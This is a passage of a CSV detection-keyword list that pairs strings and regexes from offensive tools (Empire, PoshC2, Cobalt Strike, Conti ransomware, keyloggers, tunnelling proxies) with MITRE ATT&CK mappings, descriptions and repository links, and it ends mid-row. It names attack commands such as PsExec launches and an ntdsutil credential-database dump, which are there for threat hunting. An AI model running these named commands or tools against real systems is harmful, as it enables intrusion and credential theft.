"*StarFighters*",".{0,1000}StarFighters.{0,1000}","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" "*Staring Nemesis Bot. 
Teamserver*",".{0,1000}Staring\sNemesis\sBot\.\sTeamserver.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*StarkillerSnackbar.vue*",".{0,1000}StarkillerSnackbar\.vue.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1268","189","2024-02-22T06:34:08Z","2020-03-09T05:48:58Z" "*staroffice2john.py*",".{0,1000}staroffice2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Start Menu\Programs\Startup\Loader.exe*",".{0,1000}Start\sMenu\\Programs\\Startup\\Loader\.exe.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*start PsExec.exe -d *",".{0,1000}start\sPsExec\.exe\s\-d\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*start stinger ",".{0,1000}start\sstinger\s","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*Start the Tor2web proxy*",".{0,1000}Start\sthe\sTor2web\sproxy.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*'start/stop iptables port reuse'*",".{0,1000}\'start\/stop\siptables\sport\sreuse\'.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*start_mythic_server.sh*",".{0,1000}start_mythic_server\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*start_nbnsspoof*",".{0,1000}start_nbnsspoof.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Start-ACLsAnalysis -Domain*",".{0,1000}Start\-ACLsAnalysis\s\-Domain.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*startanotherimplant*",".{0,1000}startanotherimplant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Start-CaptureServer.ps1*",".{0,1000}Start\-CaptureServer\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*startdaisy*",".{0,1000}startdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-domainACLsAnalysis*",".{0,1000}Start\-domainACLsAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A 
tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Starting bruteforce attack on *",".{0,1000}Starting\sbruteforce\sattack\son\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*Starting CcmExec service. Wait around 30 seconds for SCNotification.exe to run config file*",".{0,1000}Starting\sCcmExec\sservice\.\sWait\saround\s30\sseconds\sfor\sSCNotification\.exe\sto\srun\sconfig\sfile.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*Starting enumerating file shares using domain credential for *",".{0,1000}Starting\senumerating\sfile\sshares\susing\sdomain\scredential\sfor\s.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*Starting HVNC Server*",".{0,1000}Starting\sHVNC\sServer.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified 
Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*Starting keylogger for *",".{0,1000}Starting\skeylogger\sfor\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*starting Multi-Layered ACLight scan*",".{0,1000}starting\sMulti\-Layered\sACLight\sscan.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Starting php server at localhost:*",".{0,1000}Starting\sphp\sserver\sat\slocalhost\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*Starting PoolParty attack against process id: *",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*Starting PoolParty attack against process id:*",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:.{0,1000}","offensive_tool_keyword","Cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","9","3","282","37","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z" "*Starting port scan for *",".{0,1000}Starting\sport\sscan\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*starting RevSocksServer: *",".{0,1000}starting\sRevSocksServer\:\s.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*Starting share enumeration against * hosts*",".{0,1000}Starting\sshare\senumeration\sagainst\s.{0,1000}\shosts.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*Starting socks server * tunnel at *",".{0,1000}Starting\ssocks\sserver\s.{0,1000}\stunnel\sat\s.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*Starting tor (via systemctl)*",".{0,1000}Starting\stor\s\(via\ssystemctl\).{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*Starting wstunnel server v*",".{0,1000}Starting\swstunnel\sserver\sv.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" 
"*-start-keylogger*",".{0,1000}\-start\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*start-keystrokes*",".{0,1000}start\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*start-keystrokes-writefile*",".{0,1000}start\-keystrokes\-writefile.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Start-MonitorTCPConnections.ps1*",".{0,1000}Start\-MonitorTCPConnections\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire 
scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*start-process ntdsutil.exe *create full**",".{0,1000}start\-process\sntdsutil\.exe\s.{0,1000}create\sfull.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - 
T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*StartProcessFake(*",".{0,1000}StartProcessFake\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*Start-PSAmsiClient.ps1*",".{0,1000}Start\-PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Start-PSAmsiServer.ps1*",".{0,1000}Start\-PSAmsiServer\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*Starts a PSCMD channel on the remote end*",".{0,1000}Starts\sa\sPSCMD\schannel\son\sthe\sremote\send.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Start-SimpleHTTPServer.ps1*",".{0,1000}Start\-SimpleHTTPServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Start-TCPMonitor*",".{0,1000}Start\-TCPMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*startupfolderperistence.py*",".{0,1000}startupfolderperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Start-WebServer.ps1*",".{0,1000}Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 